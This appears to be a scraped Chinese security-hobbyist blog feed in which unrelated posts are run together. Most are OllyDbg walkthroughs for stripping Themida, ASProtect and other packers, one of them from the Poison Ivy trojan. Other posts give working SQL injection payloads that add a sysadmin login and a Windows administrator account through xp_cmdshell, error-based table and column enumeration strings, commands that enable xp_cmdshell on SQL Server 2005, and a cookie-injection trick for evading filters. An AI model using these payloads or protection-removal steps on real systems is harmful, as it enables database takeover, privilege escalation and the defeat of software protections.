zh-cn 2012-02-08T11:00:58Z hourly 1 2000-01-01T12:00+00:00 【文章作者】: wuqing1501
--------------------------------------------------------------------------------
【详细过程】


首先查壳

Themida/WinLicense V1.8.X-V2.X -> Oreans Technologies * Sign.By.fly * 20080131 *

OD载入

009E0014 X> B8 00000000 mov eax,0 ; OD载入后停在这里
009E0019 60 pushad
009E001A 0BC0 or eax,eax
009E001C 74 68 je short XX.009E0086
009E001E E8 00000000 call XX.009E0023
009E0023 58 pop eax
009E0024 05 53000000 add eax,53
009E0029 8038 E9 cmp byte ptr ds:[eax],0E9
009E002C 75 13 jnz short XX.009E0041
009E002E 61 popad
009E002F EB 45 jmp short XX.009E0076
009E0031 DB2D 37009E00 fld tbyte ptr ds:[9E0037]
009E0037 FFFF ??? ; 未知命令
009E0039 FFFF ??? ; 未知命令
009E003B FFFF ??? ; 未知命令
009E003D FFFF ??? ; 未知命令
009E003F 3D 40E80000 cmp eax,0E840


很明显的TMD入口

好了我们使用这个脚本跑吧

TMDScript-1.9.1+_1.0 final_修正集成版.osc

OD载入脚本 运行完后停在这里


004061E4 53 push ebx ; 脚本运行完 停在这里
004061E5 8BD8 mov ebx,eax
004061E7 33C0 xor eax,eax
004061E9 A3 A0104B00 mov dword ptr ds:[4B10A0],eax
004061EE 6A 00 push 0
004061F0 E8 2BFFFFFF call XX.00406120 ; jmp 到 kernel32.GetModuleHandleA
004061F5 A3 68464B00 mov dword ptr ds:[4B4668],eax
004061FA A1 68464B00 mov eax,dword ptr ds:[4B4668]
004061FF A3 AC104B00 mov dword ptr ds:[4B10AC],eax
00406204 33C0 xor eax,eax
00406206 A3 B0104B00 mov dword ptr ds:[4B10B0],eax
0040620B 33C0 xor eax,eax
0040620D A3 B4104B00 mov dword ptr ds:[4B10B4],eax
00406212 E8 C1FFFFFF call XX.004061D8
00406217 BA A8104B00 mov edx,XX.004B10A8
0040621C 8BC3 mov eax,ebx
0040621E E8 D1DBFFFF call XX.00403DF4
00406223 5B pop ebx
00406224 C3 retn

这个就是程序的第一个CALL

此时 EAX的值为004B09D0

有这些我们可以写出OEP的前几句

push ebp
mov ebp,esp
add esp,-10
mov eax,004B09D0//第一个call时 EAX的值
call 004061E4//第一个CALL的地址

好了 我们按 F8 一直运行到

00406224 C3 retn

此时记下寄存器的数值

EAX 00000000
ECX 0012FF70
EDX 0012FF88
EBX 0012FF9C
ESP 0012FF80
EBP 0012FF94
ESI 5E0000BA
EDI FFFAAF8C

然后继续按F8将进入到TMD的VM中

00C2AD4A 68 E266860C push 0C8666E2


然后再按F8几次 走过第一个JMP后 在CODE段 00401000处F2断点，F9运行 然后再在在CODE段 00401000处F2断点再运行 直到停在第二个CALL内

00478CE0 53 push ebx ; 第二个CALL
00478CE1 A1 64304B00 mov eax,dword ptr ds:[4B3064]
00478CE6 8338 00 cmp dword ptr ds:[eax],0
00478CE9 74 0A je short XX.00478CF5
00478CEB 8B1D 64304B00 mov ebx,dword ptr ds:[4B3064] ; XX.004B4044
00478CF1 8B1B mov ebx,dword ptr ds:[ebx]
00478CF3 FFD3 call ebx
00478CF5 5B pop ebx
00478CF6 C3 retn

此时我们记下第二个CALL的地址 和寄存器的内容

EAX 03181804
ECX 0012FF70
EDX 0012FF88
EBX 0012FF9C
ESP 0012FF80
EBP 0012FF94
ESI 5E0000BA
EDI FFFAAF8C

然后我们与第一次记录的寄存器比较，发现只有EAX发生了变化 ，我们按CTRL+B搜索二进制 04 18 18 03 找到了地址004B1484，这时我们可以补充OEP为

push ebp
mov ebp,esp
add esp,-10
mov eax,004B09D0//第一个call时 EAX的值
call 004061E4//第一个CALL的地址
mov eax,dword ptr ds:[4B1484]//如果找不到的话可以直接写成mov eax,004B1484
mov eax,dword ptr ds:[eax]
CALL 00478CE0


然后我们继续按F8直到走完第二个CALL

00478CF6 C3 retn

此时我们再记录下寄存器的数据

EAX 00000001
ECX 76AB67F0 ole32.76AB67F0
EDX 76AB67F0 ole32.76AB67F0
EBX 0012FF9C
ESP 0012FF80
EBP 0012FF94
ESI 5E0000BA
EDI FFFAAF8C

然后我们继续安装上面的步骤执行 直到程序运行到第三个CALL

00406428 55 push ebp ; 第三个call
00406429 8BEC mov ebp,esp
0040642B 8B45 10 mov eax,dword ptr ss:[ebp+10]
0040642E 50 push eax
0040642F 837D 0C 01 cmp dword ptr ss:[ebp+C],1
00406433 1BC0 sbb eax,eax
00406435 40 inc eax
00406436 83E0 7F and eax,7F
00406439 50 push eax
0040643A 8B45 08 mov eax,dword ptr ss:[ebp+8]
0040643D 50 push eax
0040643E E8 DDFFFFFF call XX.00406420 ; jmp 到 kernel32.createMutexA
00406443 5D pop ebp
00406444 C2 0C00 retn 0C

此时我们记下 第三个CALL的地址和寄存器的数据

EAX 00000001
ECX 76AB67F0 ole32.76AB67F0
EDX 76AB67F0 ole32.76AB67F0
EBX 0012FF9C
ESP 0012FF74
EBP 0012FF94
ESI 5E0000BA
EDI FFFAAF8C
此时寄存器与我们上次记录的数据相比 只有ESP发生了变换 变化值为：0012FF74-0012FF80=-c 这时我们可以修复OEP为

push ebp
mov ebp,esp
add esp,-10
mov eax,004B09D0//第一个call时 EAX的值
call 004061E4//第一个CALL的地址
mov eax,dword ptr ds:[4B1484]//如果找不到的话可以直接写成mov eax,004B1484
mov eax,dword ptr ds:[eax]
CALL 00478CE0
add esp,-c
call 00406428

然后我们继续F8做完第三个CALL 记下寄存器的数据

EAX 00000208
ECX 0012FEF8
EDX 7C92E514 ntdll.KiFastSystemCallRet
EBX 0012FF9C
ESP 0012FF74
EBP 0012FF94
ESI 5E0000BA
EDI FFFAAF8C

然后继续按F8走到VM中，然后和上面一样继续CODE段下断点，直到程序停在非VM 中，中间遇到 012214DE F3:A4 rep movs byte ptr es:[edi],byte ptr d> 这样的可以 F7一次，然后再F8一次走过去，然后继续下断点运

行

运行几次后发现程序停在了这里


004B0E50 E8 D356F5FF call XX.00406528 ; jmp 到 ntdll.RtlGetLastWin32Error 最后停在这里了
004B0E55 3D B7000000 cmp eax,0B7
004B0E5A 75 10 jnz short XX.004B0E6C
004B0E5C A1 48534B00 mov eax,dword ptr ds:[4B5348]
004B0E61 50 push eax
004B0E62 E8 9955F5FF call XX.00406400 ; jmp 到 kernel32.CloseHandle
004B0E67 E9 C2000000 jmp XX.004B0F2E
004B0E6C A1 78314B00 mov eax,dword ptr ds:[4B3178]

走到这里我们可以直到已经运行到程序的部分了，这里就是OEP的附近了

此时我们记下寄存器中的数据

EAX 00000208
ECX 0012FEF8
EDX 7C92E514 ntdll.KiFastSystemCallRet
EBX 0012FF9C
ESP 0012FF84
EBP 0012FF94
ESI 5E0000BA
EDI FFFAAF8C

此时与上面的寄存器比较一下 还是只有 ESP发生变化 变化值为 0012FF84-0012FF74=10

好了我们可以把OEP修复为

push ebp
mov ebp,esp
add esp,-10
mov eax,004B09D0//第一个call时 EAX的值
call 004061E4//第一个CALL的地址
mov eax,dword ptr ds:[4B1484]//如果找不到的话可以直接写成mov eax,004B1484
mov eax,dword ptr ds:[eax]
CALL 00478CE0
add esp,-c
call 00406428
add esp,10

这样我们就找到了所有被VM的的OEP了，其实整个过程就是 看每次寄存器那些数据发生了变化 我们把相应的变化写出来就可以了

此时我们分析一下数据 看看OEP的具体位置在哪里？

根据Delphi程序的入口 OEP一般位于

0044CA7C . \4C364200 dd delphi7.0042364C
0044CA80 . ACC64400 dd delphi7.0044C6AC
0044CA84 . 50C64400 dd delphi7.0044C650
0044CA88 . 88C84400 dd delphi7.0044C888
0044CA8C . 58C84400 dd delphi7.0044C858
0044CA90 00 db 00
0044CA91 00 db 00
0044CA92 00 db 00
0044CA93 00 db 00
0044CA94 . 90C84400 dd delphi7.0044C890//根据Delphi程序的入口 OEP一般位于这个下面

看我们分析后的代码



004B0E02 ? 4A dec edx
004B0E03 ? 00CC add ah,cl
004B0E05 ? F7 ??? ; 未知命令
004B0E06 ? 4A dec edx
004B0E07 ? 00A0 094B0064 add byte ptr ds:[eax+64004B09],ah
004B0E0D ? 094B 00 or dword ptr ds:[ebx],ecx
004B0E10 00 db 00
004B0E11 00 db 00
004B0E12 00 db 00
004B0E13 00 db 00
004B0E14 A8094B00 dd XX.004B09A8
004B0E18 77 db 77 ; CHAR 'w'
004B0E19 3D db 3D ; CHAR '='
004B0E1A D6 db D6

那我们的OEP地址应该就是004B0E18 了

好我们把我们修复好的代码从这里开始写上去 发现写好后


004B0E50 E8 D356F5FF call XX.00406528这个代码与我们写的代码之间还有些数据，我们可以直接用个跳转跳到这里也可以直接把中间的代码都NOP掉，我就直接NOP掉了

好了 到了这里我们的工作基本上就算完成了

修复好的OEP

55 8B EC 83 C4 F0 B8 D0 09 4B 00 E8 BC 53 F5 FF A1 84 14 4B 00 8B 00 E8 AC 7E FC FF 83 C4 F4 E8 EC 55 F5 FF 83 C4 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90

恩 在004B0E18 新建EIP吧，

然后用LordPE DUMP出来，再用ImportREC修复一下就可以了，看看怎么样软件运行了吧！


]]> 2010-09-03T23:41:58Z http://hashchecker.de/

http://hashkiller.com/password/

md5

IP查询
http://www.yougetsignal.com/tools/web-sites-on-web-server/

]]> 2010-07-13T10:36:10Z
不能复制 不能右键

]]> 2010-03-08T10:55:55Z select host_name();
得到服务端主机名:
select @@servername;
结果一样就极有可能未分离，结果不一样就是分离的

/*

;exec master..sp_addlogin sql,sqlwoaini--
;exec master..sp_addsrvrolemember sql,sysadmin--

;EXEC MASTER..XP_CMDSHELL 'net user sql sqlwoaini /add'--
;EXEC MASTER..XP_CMDSHELL 'net localgroup administrators sql /add'--
*/


[N] = 第N個表
ID=1 and (select top 1 name from(select top [N] id,name from sysobjects where xtype=char(85)) T order by id desc)>1

[T] = 表名
[N] = 第N個字段
ID=1 and (select Top 1 col_name(object_id('[T]'),[N]) from sysobjects)>1

]]> 2010-03-04T15:56:44Z 得到客户端主机名:
select host_name();
得到服务端主机名:
select @@servername;
结果一样就极有可能未分离，结果不一样就是分离的


]]> 2010-01-22T15:55:24Z SQL2005开启选项的一些方法整理:
 sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
关闭一样.只是将上面的后面的那个"1"改成"0"就可以了:
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
 sql2005下，xp_cmdshell、sp_oA的开启方法我查到资料了，我都已经开启了，浏览器返回正常，执行命令不会再出现权限错误，但是执行"sp_oA"时会出现超时提示，执行"xp_cmdshell"时，本地监听无反应，这些我在提问贴里已经说明了，不知道是不是防火墙阻止了ping、tftp 和telnet的对外连接,我实在是找不到好的得到这个SQL2005的IP的办法了.
 SQL2005开启'OPENROWSET'支持的方法：
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
;exec sp_configure "show advanced options", 1;RECONFIGURE;exec sp_configure "Ad Hoc Distributed Queries",1;RECONFIGURE;--
 SQL2005开启'sp_oacreate'支持的方法:
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;


]]> 2010-01-22T15:32:11Z Alexey Solodovnikov 可能是最早的asprotect的壳了吧 我今天下载后自己加了壳试了试 的确挺简单的. 用最后一次异常法来到最后一次异常处后,再用代码段内存访问断点就到OEP了. 这时,IAT是加密的. dd 405000内存写入断点可来到这里 ...]]>
可能是最早的asprotect的壳了吧
我今天下载后自己加了壳试了试
的确挺简单的.

用最后一次异常法来到最后一次异常处后,再用代码段内存访问断点就到OEP了.

这时,IAT是加密的.
dd 405000内存写入断点可来到这里
/*92F4D0*/ CALL 0092F0EC
/*92F4D5*/ CALL 0092F358
/*92F4DA*/ MOV EDX,DWORD PTR DS:[EDI]
/*92F4DC*/ MOV DWORD PTR DS:[EDX],EAX //这里eax是错误的IAT

但是过了/*92F4D0*/ CALL 0092F0EC后eax是正确的IAT
那么nop掉/*92F4D5*/ CALL 0092F358这句应该是可以的.

不过还是有校验.
nop完顺便 hr 92F4D5再f9后 发现IAT已经填充完了.
这时候还等什么 马上dumpfix吧
完了后发现还有一个指针是错的,剪切掉后能正常运行,呵呵到这就over了.



]]> 2009-05-03T17:49:04Z 感觉也就那样 没什么可值得研究的
基本上一些不太复杂的加密壳也都能脱了
复杂的 我也没精力弄了 毕竟好多都有脚本或者脱壳机

以后碰到再说吧
主业还是安全这块 多分析分析漏洞也许是有用的

]]> 2009-04-27T16:12:29Z //#pragma comment(lib,"kernel32.lib") // 使区段对齐减小 #pragma comment(linker, "/FILEALIGN:16") #pragma comment(linker, "/ALIGN:16") #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // 合并区段...]]> //#pragma comment(lib,"kernel32.lib")
// 使区段对齐减小
#pragma comment(linker, "/FILEALIGN:16")
#pragma comment(linker, "/ALIGN:16")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
// 合并区段
#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /SECTION:.text,EWR")
#pragma comment(linker, "/OPT:REF")
#pragma comment(linker, "/OPT:ICF")
#pragma comment(linker, "/OPT:NOWIN98")
// 开启编译器优化
#pragma optimize("gsy", on)
//int main(int argc, char* argv[])
int mainCRTStartup()
{
MessageBox(NULL, "ok", "ok", MB_OK);
return 0;
}


LINK那里要忽略所有库文件

]]> 2009-04-23T15:35:51Z WebtoolMaster 两分钟解决了这个 感觉比上面那个简单多了. OEP 内存访问断 代码段---PE头---代码段 就到了 /*4070D1*/ PUSH EBP /*4070D2*/ MOV EBP,ESP /*4070D4*/ PUSH -1 /*4070D6*/ PUSH 0014.0040C0E8 /*4070DB*/ PUSH 0014...]]> 两分钟解决了这个
感觉比上面那个简单多了.

OEP
内存访问断
代码段---PE头---代码段
就到了
/*4070D1*/ PUSH EBP
/*4070D2*/ MOV EBP,ESP
/*4070D4*/ PUSH -1
/*4070D6*/ PUSH 0014.0040C0E8
/*4070DB*/ PUSH 0014.0040855C
/*4070E0*/ MOV EAX,DWORD PTR FS:[0]
/*4070E6*/ PUSH EAX
he 4070d1
这时候dumpfix不行 因为有部分iat加密了

0040C0B8 7D6111E8 shell32.ShellExecuteA
0040C0BC 00000000
0040C0C0 001434C0
0040C0C4 001434C5
0040C0C8 001434CA
0040C0CC 001434CF
0040C0D0 001434D4
0040C0D4 001434D9
0040C0D8 001434DE
0040C0DC 001434E3
0040C0E0 001434E8


在0040C0C0下内存访问断

可知道有两个地方会覆盖
004176AB /76 0E JBE SHORT 0014.004176BB
004176AD |EB 2A JMP SHORT 0014.004176D9
004176AF |EB 0A JMP SHORT 0014.004176BB
004176B1 |81FB 00000080 CMP EBX,80000000
004176B7 |73 02 JNB SHORT 0014.004176BB
把004176AB 和004176B7处的jnb nop掉就行了.


不过还有校验的地方
hr 004176AB 可来到这里
/*4173CE*/ MUL EDX
/*4173D0*/ ADD EBX,EAX
/*4173D2*/ INC EDX
/*4173D3*/ INC EDI
/*4173D4*/ LOOPD SHORT 0014.004173CC
/*4173D6*/ XCHG EAX,EBX

这里有个跳转
00417739 8B9D F82F4000 MOV EBX,DWORD PTR SS:[EBP+402FF8]
0041773F 33C3 XOR EAX,EBX
00417741 74 08 JE SHORT 0014.0041774B

je没实现就改为jmp吧
现在再到OEP后直接用OD插件脱壳都是OK的.

]]> 2009-04-22T16:59:33Z 最关键是 linker选项里面勾上ignore default libraries

]]> 2009-04-17T14:07:25Z
国产的 好象名字是 仙剑1.003
用PEID查 有个区段是XJ

OEP好找。 2次内存断点即可。
我这里是40169d。he 40169d
DUMP后修复有问题。
找了个无效指针4050ac记录下。

重新载入
dd 4050ac 下内存写入断点。
发现在/*40E955*/ MOV DWORD PTR DS:[EDX],ESI
给覆盖了。
往上看 发现这个地方跳转实现的话 就覆盖。
/*40E93A*/ JBE SHORT CrackM.0040E94A

NOP掉吧
再重新来过，
he 40e93a

在到达OEP后会退出，看来有校验。

hr 40e93a

这时发现校验在这里
/*40E9D6*/ JE SHORT CrackM.0040E9E0
把它jmp就过了校验。
DUMP时记得修正一下境象大小。
修复完IAT 再打开程序 就能运行了。看来这个壳还算简单。

我感觉他的加密IAT和校验有点象yoda's Protector里面的代码啊。

]]> 2009-04-12T21:55:59Z bart/xt 也算是压缩壳吧,不过比其他的稍微麻烦点. 入口点是这样的 /*400154*/ XCHG DWORD PTR DS: ,ESP /*40015A*/ POPAD /*40015B*/ XCHG EAX,ESP /*40015C*/ PUSH EBP /*40015D*/ MOVS BYTE PTR ES: ,BYTE PTR DS: /*40015E*/ MOV DH,80 /...]]>
也算是压缩壳吧,不过比其他的稍微麻烦点.

入口点是这样的

/*400154*/ XCHG DWORD PTR DS:[505AE0],ESP
/*40015A*/ POPAD
/*40015B*/ XCHG EAX,ESP
/*40015C*/ PUSH EBP
/*40015D*/ MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
/*40015E*/ MOV DH,80
/*400160*/ CALL DWORD PTR DS:[EBX]
/*400162*/ JNB SHORT KeyGen.0040015D
/*400164*/ XOR ECX,ECX
/*400166*/ CALL DWORD PTR DS:[EBX]
/*400168*/ JNB SHORT KeyGen.00400180
/*40016A*/ XOR EAX,EAX
/*40016C*/ CALL DWORD PTR DS:[EBX]
/*40016E*/ JNB SHORT KeyGen.0040018F
/*400170*/ MOV DH,80
/*400172*/ INC ECX
/*400173*/ MOV AL,10
/*400175*/ CALL DWORD PTR DS:[EBX]
/*400177*/ ADC AL,AL
/*400179*/ JNB SHORT KeyGen.00400175
/*40017B*/ JNZ SHORT KeyGen.004001B7
/*40017D*/ STOS BYTE PTR ES:[EDI]
/*40017E*/ JMP SHORT KeyGen.00400160
/*400180*/ CALL DWORD PTR DS:[EBX+8]
/*400183*/ ADD DH,DH
/*400185*/ SBB ECX,1
/*400188*/ JNZ SHORT KeyGen.00400198
/*40018A*/ CALL DWORD PTR DS:[EBX+4]
/*40018D*/ JMP SHORT KeyGen.004001B3
/*40018F*/ LODS BYTE PTR DS:[ESI]
/*400190*/ SHR EAX,1
/*400192*/ JE SHORT KeyGen.004001C1
/*400194*/ ADC ECX,ECX
/*400196*/ JMP SHORT KeyGen.004001B0
/*400198*/ XCHG EAX,ECX
/*400199*/ DEC EAX
/*40019A*/ SHL EAX,8
/*40019D*/ LODS BYTE PTR DS:[ESI]
/*40019E*/ CALL DWORD PTR DS:[EBX+4]
/*4001A1*/ CMP EAX,DWORD PTR DS:[EBX-8]
/*4001A4*/ JNB SHORT KeyGen.004001B0
/*4001A6*/ CMP AH,5
/*4001A9*/ JNB SHORT KeyGen.004001B1
/*4001AB*/ CMP EAX,7F
/*4001AE*/ JA SHORT KeyGen.004001B2
/*4001B0*/ INC ECX
/*4001B1*/ INC ECX
/*4001B2*/ XCHG EAX,EBP
/*4001B3*/ MOV EAX,EBP
/*4001B5*/ MOV DH,0
/*4001B7*/ PUSH ESI
/*4001B8*/ MOV ESI,EDI
/*4001BA*/ SUB ESI,EAX
/*4001BC*/ REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
/*4001BE*/ POP ESI
/*4001BF*/ JMP SHORT KeyGen.00400160
/*4001C1*/ POP ESI
/*4001C2*/ LODS DWORD PTR DS:[ESI]
/*4001C3*/ XCHG EAX,EDI
/*4001C4*/ LODS DWORD PTR DS:[ESI]
/*4001C5*/ PUSH EAX
/*4001C6*/ CALL DWORD PTR DS:[EBX+10]
/*4001C9*/ XCHG EAX,EBP
/*4001CA*/ MOV EAX,DWORD PTR DS:[EDI]
/*4001CC*/ INC EAX
/*4001CD*/ JS SHORT KeyGen.004001C2
/*4001CF*/ JNZ SHORT KeyGen.004001D4
/*4001D1*/ JMP DWORD PTR DS:[EBX+C]
/*4001D4*/ PUSH EAX
/*4001D5*/ PUSH EBP
/*4001D6*/ CALL DWORD PTR DS:[EBX+14]
/*4001D9*/ STOS DWORD PTR ES:[EDI]
/*4001DA*/ JMP SHORT KeyGen.004001CA
/*4001DC*/ XOR ECX,ECX
/*4001DE*/ INC ECX
/*4001DF*/ CALL DWORD PTR DS:[EBX]
/*4001E1*/ ADC ECX,ECX
/*4001E3*/ CALL DWORD PTR DS:[EBX]
/*4001E5*/ JB SHORT KeyGen.004001DF
/*4001E7*/ RET
/*4001E8*/ ADD DL,DL
/*4001EA*/ JNZ SHORT KeyGen.004001F1
/*4001EC*/ MOV DL,BYTE PTR DS:[ESI]
/*4001EE*/ INC ESI
/*4001EF*/ ADC DL,DL
/*4001F1*/ RET

这个用esp定律好象不行.
不过比较短,可以单步慢慢跟.
跟过两遍后发现直接f4到这
/*4001D1*/ JMP DWORD PTR DS:[EBX+C]
再单步一下就到oep了.
这时看下iat

0040C09C 7C80CD27 kernel32.SetHandleCount
0040C0A0 7C812FC9 kernel32.GetStdHandle
0040C0A4 7C810EE1 kernel32.GetFileType
0040C0A8 7C94ABA5 ntdll.RtlUnwind
0040C0AC 7C810E17 kernel32.WriteFile
0040C0B0 7C80AE30 kernel32.GetProcAddress
0040C0B4 7C812A99 kernel32.RaiseException
0040C0B8 7C812F06 kernel32.GetCPInfo
0040C0BC 7C8099A5 kernel32.GetACP
0040C0C0 7FFFFFFF
0040C0C4 77D24A4E user32.EndDialog
0040C0C8 77D507EA user32.MessageBoxA
0040C0CC 77D2E8F6 user32.LoadIconA
0040C0D0 77D2F3C2 user32.SendMessageA
0040C0D4 77D3B144 user32.DialogBoxParamA
0040C0D8 77D6B05E user32.GetDlgItemTextA
0040C0DC 7FFFFFFF
0040C0E0 76B15A4A winmm.waveOutWrite
0040C0E4 76B159D9 winmm.waveOutPrepareHeader
0040C0E8 76B15201 winmm.waveOutOpen
0040C0EC 76B15726 winmm.waveOutClose

每组iat中间间隔是7fffffff而不是00000000
这个好说 右键--->二进制填充为0就ok了
这时再dump和修复iat就能运行了.

]]> 2009-04-10T14:46:23Z 再设置忽略所有异常,脱这个壳也不用这么麻烦
直接hr esp f9 f9 f9 就OK了.

]]> 2009-04-10T12:38:20Z

手脱原版的Poison Ivy 2.3.2.exe
听说国外这个马功能很强大。想玩玩试试，随手用PEID查看发现加的有壳。
不过没查出来是什么壳，只看到最后一个区段名是GPPE。
不管了，给它脱了！！
--------------------------邪恶的分割线----------------------------
1.查找OEP
可以用老Y写的GUnPacker0.50来找

当然这个也可以直接用esp定律。F9两次就可以到
/*561A9C*/ PUSH EBP
/*561A9D*/ MOV EBP,ESP
/*561A9F*/ MOV ECX,4
/*561AA4*/ PUSH 0
/*561AA6*/ PUSH 0
/*561AA8*/ DEC ECX
/*561AA9*/ DB 75
/*561AAA*/ DB F9

0x00561A9C就是OEP了。

--------------------------华丽的分割线----------------------------
2.去校验。
找到OEP后可以先he 561A9C作备用。
这时DUMP后再ImportREC修复IAT时发现有好多无效的。
可能有些IAT被加密了。
顺手找一个CALL
/*561D11*/ CALL Poison_I.0040720C
enter敲进去看下
/*40720C*/ JMP DWORD PTR DS:[5684CC]
然后在命令窗口dd 5684CC

00568310 7C812FC9 kernel32.GetStdHandle
00568314 7C810B07 kernel32.GetFileSize
00568318 7C810EE1 kernel32.GetFileType
0056831C 7C801A28 kernel32.createFileA
00568320 7C809BD7 kernel32.CloseHandle
00568324 00000000
00568328 001534E0 ;加密了
0056832C 001534E5
00568330 001534EA
00568334 001534EF
00568338 00000000
0056833C 001534F4
00568340 001534F9
00568344 001534FE

发现确实有一些IAT被加密了

重新来过吧
在 00568328下内存写入断点。

当发现 变为00568328 77D311DB user32.GetKeyboardType时

注意看数据窗口
ESI=001534E0
DS:[00568328]=77D311DB (user32.GetKeyboardType)
然后F8走一下看看
发现
/*61161D*/ CMP EBX,77FFFFFF
/*611623*/ JBE SHORT Poison_I.00611633
在611623处跳转实现了就会加密。所以这里干脆把它NOP掉。

但是NOP掉后再F9执行，程序直接退出了，看来还是有校验啊。


那我在hr 611623再F9 看看到底那里校验我的。

来到这了
/*611319*/ MOV AL,BYTE PTR DS:[EDI]
/*61131B*/ MUL EDX
/*61131D*/ ADD EBX,EAX
/*61131F*/ INC EDX
/*611320*/ INC EDI
/*611321*/ LOOPD SHORT Poison_I.00611319
/*611323*/ XCHG EAX,EBX

MOV AL,BYTE PTR DS:[EDI]就是取那里的代码然后放到了eax里。
把这个循环走出来再看下，
/*611695*/ JMP SHORT Poison_I.00611698
/*611697*/ ???
/*611698*/ MOV EBX,DWORD PTR SS:[EBP+40425E]
/*61169E*/ XOR EAX,EBX ;这里是比较是否相等的，关键。
/*6116A0*/ JE SHORT Poison_I.006116AA

比完以后没跳转，那我把它改成jmp 006116AA应该就OK了。
把其他断点全删除，只留到OEP那个，再F9后就飞向光明之颠。

避开了IAT加密，这次再DUMP，修复IAT就没问题了。不过在DUMP时要先修正下镜象大小。注意OEP=561A9C-40000=161a9c。



]]> 2009-04-10T12:12:57Z
]]> 2009-03-20T15:07:06Z = Factor) result += Number /= Factor; return result; } int GetLastDigit...]]>

int GetFactorNumber(unsigned Number, unsigned Factor)
{
int result = 0;
if(Factor < 2 || Number < 1)
return -1;
while(Number >= Factor)
result += Number /= Factor;
return result;
}

int GetLastDigit(unsigned Number)
{
int result = 1;/*这是连乘法的基础值，也是最后要返回的结果*/
int i;/*循环变量*/
int tmp;/*循环中用到的临时值*/
int Count = 0;/*记录找到的因子2的个数，直到和因子5的个数相等*/
int TotalFactors = GetFactorNumber(Number, 5);/*因子5的总数*/
for(i = Number; i >= 1; i--)/*从Number一直向下处理*/
{
tmp = i;
/*尽可能多的得到因子2，直到tmp是个奇数或者不需要更多的因子2*/
while(tmp % 2 == 0 && Count < TotalFactors)
{
tmp /= 2;
Count++;
}
while(tmp % 5 == 0)/*除去所有的因子5*/
tmp /= 5;
tmp %= 10;/*取得个位数*/
result *= tmp;/*做阶乘*/
result %= 10;/*只保留个位数*/
}
return result;/*返回运算结果*/
}

int main(int argc, char* argv[])
{

unsigned k=GetLastDigit(2008);

  printf("%d\n",k);
  return 0;
}


]]> 2009-02-25T11:47:44Z
可以先把流程的跳转都给改正确了 然后保存之

载入OD

然后随便在一处暴的地方 hr 下硬件访问断点

F9运行,会跑到校验的地方.然后再改跳转即可.

]]> 2009-02-24T20:24:56Z
]]> 2009-02-18T16:51:52Z 就禁止数据的提交! 但他没有检测Cookies的数据！问题就来了~~~
那我们怎样测试是否有Cookies注入问题~

请先看下面的的连接(示例用,所以连接不是真的)

http://www.xxx.com/1.asp?id=123

如果我们只输 http://www.xxx.com/1.asp

时，就不能看到正常的数据，因为没有参数!
我们想知道有没有Cookies问题(也就是有没有Request("XXX")格式问题),
先用IE输入
http://www.xxx.com/1.asp
加载网页,显示不正常（没有输参数的原因)
之后在IE输入框再输入
javascript:alert(document.cookie="id="+escape("123"));
按回车,你会看到弹出一个对话框 内容是: id=123
之后，你刷新一个网页，如果正常显示，表示是用
Request("ID") 这样的格式收集数据~~~~,这种格式就可以试Cookies注入了

在输入框中输入
javascript:alert(document.cookie="id="+escape("123 and 3=3"));
刷新页面,如果显示正常,可以再试下一步(如果不正常,就有可能也有过滤了)

javascript:alert(document.cookie="id="+escape("123 and 3=4"));刷新一下页面
如果不正常显示，这就表示有注入了~~~

如果程序员是用
Request.QueryString
或
Request.Form
收集数据的话，是无法利用Cookies绕过防注入系统进行注入的，因为服务程序是直截从GET或POST中读取数据的，Cookies是否有数据,WEB服务器是不理的,所以就无法利用了！~

--------------------------------------------------------------------------




]]> 2009-02-10T17:09:04Z